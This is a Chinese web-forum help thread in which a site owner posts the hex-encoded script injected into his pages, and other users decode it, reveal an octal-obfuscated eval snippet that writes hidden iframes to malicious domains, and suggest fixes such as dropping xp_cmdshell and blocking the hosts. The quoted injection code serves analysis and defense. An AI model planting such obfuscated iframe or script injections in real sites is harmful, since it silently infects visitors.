网站被挂马了。。。大侠帮帮。。
网站被挂马了。。。<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
不明白上面的
\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E
为什么也可以运行。。。
是加密的吗?
怎么加密和解密的。
那位大侠能说说她的原理,或丢写参考资料、!!! --------------------编程问答-------------------- 等着。。。。 --------------------编程问答-------------------- 友情顶上,被木马攻击实在麻烦,表示同情! --------------------编程问答-------------------- a .a
lai ren a --------------------编程问答-------------------- 来人啊。。。。 --------------------编程问答-------------------- 这是个什么东西哦?运行了这段脚本之后有啥反应? --------------------编程问答-------------------- 写成ascii了
原文:
<script src=http://OffIce.FAQServ.CoM/FAQ.js>
--------------------编程问答-------------------- JavaScript执行16进制时会自行转换为对应字符。 --------------------编程问答-------------------- 你是怎么把她转换过来的? --------------------编程问答-------------------- 格式化!!(我乱讲的) --------------------编程问答-------------------- 看看。 --------------------编程问答-------------------- 这个我遇到过,你要是找到它的连接登进去看一下,非把你吓死不可,啥子功能都有,就连你的服务器文件,数据库都可以删除,想干吗干吗!我当时狂看IIS日志,才找到木马文件所在,将文件清了就可以了。不过,你网站肯定有漏洞,还是要把洞补了才得行! --------------------编程问答-------------------- 很简单,不让你直接看到他的地址而以。
做个转换即可:
--------------------编程问答--------------------
<script type="text/javascript">
var url = "\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E";
alert(decodeURI(url));
</script>
汗
eval("\166\141\162\40\124\150\145\156\40\75\40\156\145\167\40\104\141\164\145\50\51\73\15\12\124\150\145\156\56\163\145\164\124\151\155\145\50\124\150\145\156\56\147\145\164\124\151\155\145\50\51\40\53\40\63\60\52\66\60\52\61\60\60\60\40\51\73\40\15\12\166\141\162\40\143\157\157\153\151\145\123\164\162\151\156\147\40\75\40\156\145\167\40\123\164\162\151\156\147\50\144\157\143\165\155\145\156\164\56\143\157\157\153\151\145\51\73\15\12\166\141\162\40\143\157\157\153\151\145\110\145\141\144\145\162\40\75\40\47\141\153\170\170\47\40\73\15\12\166\141\162\40\142\145\147\151\156\120\157\163\151\164\151\157\156\40\75\40\143\157\157\153\151\145\123\164\162\151\156\147\56\151\156\144\145\170\117\146\50\143\157\157\153\151\145\110\145\141\144\145\162\51\73");
if (beginPosition == -1)
{
document.write('<iframe height="0" frameborder="1" src="http://www.59.vc/page/add_54738542.htm" width="10" ></iframe>');
document.write('<iframe height="0" frameborder="1" src="http://office.faqserv.com/faq.htm" width="10" ></iframe>');
document.cookie = "Cookieakxx=akxx;expires="+ Then.toGMTString() +";path=/";
} --------------------编程问答-------------------- var Then = new Date(); Then.setTime(Then.getTime() + 30*60*1000 ); var cookieString = new String(document.cookie); var cookieHeader = 'akxx' ; var beginPosition = cookieString.indexOf(cookieHeader);
if (beginPosition == -1)
{
document.write(' <iframe height="0" frameborder="1" src="http://www.59.vc/page/add_54738542.htm" width="10" > </iframe> ');
document.write(' <iframe height="0" frameborder="1" src="http://office.faqserv.com/faq.htm" width="10" > </iframe> ');
document.cookie = "Cookieakxx=akxx;expires="+ Then.toGMTString() +";path=/";
} --------------------编程问答-------------------- 关注一下 --------------------编程问答-------------------- 99% 是SqlServer 招惹的。
执行
Use Master
exec sp_dropextendedproc 'xp_cmdshell'
Go
数据库专心作数据库,不要控制windows。 --------------------编程问答-------------------- 你设置权限就可以了..你的网站是不是有上传功能 --------------------编程问答-------------------- js木马,系统要注意打上ms06-014、ms07-17补丁
删除后不再出现最好,呵呵。
有时要防止局域网内其他中木马的机器再次进行感染,可通过arp防火墙禁止。
暂时可以在 hosts文件中加入如下内容就可以屏蔽文件中定义的对应的网址。 (文件位置C:\WINDOWS\system32\drivers\etc 可以用记事本打开)
127.0.0.1 localhost
127.0.0.1 www.59.vc
127.0.0.1 59.vc
127.0.0.1 OffIce.FAQServ.com
127.0.0.1 FAQServ.com
127.0.0.1 www.FAQServ.com
进行屏蔽 --------------------编程问答-------------------- UP --------------------编程问答-------------------- 这问题很严重,很明显是网站存在漏洞而被攻击了,若需要安全技术服务请联系EMAIL & MSN:yisheng@hotmail.com, 7X24 为您的网站保驾护航。 --------------------编程问答-------------------- 安全第一啊.
不过你连"javascript"字符串都没过滤,最起码的安全工作都没有做啊. --------------------编程问答-------------------- 顶啊 --------------------编程问答-------------------- --------------------编程问答--------------------
广告 --------------------编程问答-------------------- 服务器的问题 --------------------编程问答-------------------- 服务器的问题 --------------------编程问答-------------------- http://OffIce.FAQServ.CoM/FAQ.js --------------------编程问答-------------------- http://topic.csdn.net/u/20090729/14/26381958-0d6e-4b90-bc90-d275e9621f93.html --------------------编程问答-------------------- up.... --------------------编程问答-------------------- 同情。。。。。。。。。。。 --------------------编程问答--------------------
这个广告很到位啊~~
补充:.NET技术 , ASP.NET